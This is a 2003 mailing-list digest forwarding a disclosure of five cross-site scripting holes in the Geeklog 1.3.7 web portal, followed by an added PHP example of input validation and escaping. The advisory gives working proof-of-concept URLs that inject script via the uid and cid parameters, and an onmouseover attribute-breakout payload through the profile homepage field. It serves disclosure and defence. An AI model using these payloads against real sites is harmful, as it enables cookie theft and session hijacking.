[Please upgrade if you use Geeklog -- Raju]

This is an RFC 1153 digest.
(1 message)
----------------------------------------------------------------------
Message-ID: <[EMAIL PROTECTED]>
From: snooq <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Multiple XSS in Geeklog 1.3.7
Date: 14 Jan 2003 02:43:01 -0000

nothing new. typical XSS bugs.

summary
=======

Geeklog is a web portal system written in PHP. There exist 5 XSS holes in
the software.

the 'holes'
===========

--1--

http://vulnerable.host/profiles.php?uid=<script>alert(document.cookie)</script>

--2--

http://vulnerable.host/users.php?mode=profile&uid=<script>alert(document.cookie)</script>

--3--

http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>

--4--

http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>

--5--

'homepage' field in the user's account information page is not sanitised
properly. As a result, javascript can be injected by setting the 'homepage'
field like this:

http://url" onmouseover="alert(document.cookie)

** 3) & 4) were found by Dirk Haun of Geeklog Team.

vendor status
=============

03/01/2003 contacted Dirk Haun of Geeklog team
14/01/2003 Geeklog 1.3.7sr1 was released. New version closes all holes found.

--==snooq==--

------------------------------

End of this Digest
******************

--
Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/
It is the mind that moves
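
The advisory shows two injection contexts: id-style query parameters (uid, cid) and a profile field placed inside a quoted HTML attribute. The PHP below is an added example of handling both on the server side; it is not Geeklog code and not the 1.3.7sr1 patch. The function names clean_id, h and render_homepage are hypothetical, and it assumes uid and cid are meant to be positive integers.

```php
<?php
// Added illustration; not Geeklog source and not the 1.3.7sr1 fix.

/** Accept only a positive decimal integer for id-style parameters (assumed: uid, cid). */
function clean_id($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw)) {
        return null;               // rejects markup, empty strings, "7abc", arrays
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

/** Escape for HTML text and for single- or double-quoted attribute values. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

/** Render the 'homepage' field as a link only for http(s); otherwise as inert text. */
function render_homepage(string $url): string
{
    $url = trim($url);
    // parse_url() returns null or false when no scheme can be extracted.
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return h($url);
    }
    // The embedded double quote becomes &quot;, so it cannot close the href attribute.
    return '<a href="' . h($url) . '" rel="nofollow">' . h($url) . '</a>';
}

// Constructed inputs, modelled on the strings quoted in the advisory.
foreach (['2', '<script>alert(document.cookie)</script>', '7abc'] as $raw) {
    $id = clean_id($raw);
    echo $id === null ? "rejected\n" : "uid={$id}\n";
}
echo render_homepage('http://url" onmouseover="alert(document.cookie)'), "\n";
echo render_homepage('http://example.org/'), "\n";
```

Validation at input and escaping at output are independent layers: the integer check covers holes 1 to 4, while the attribute-context escaping is what neutralises the 'homepage' string in hole 5.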
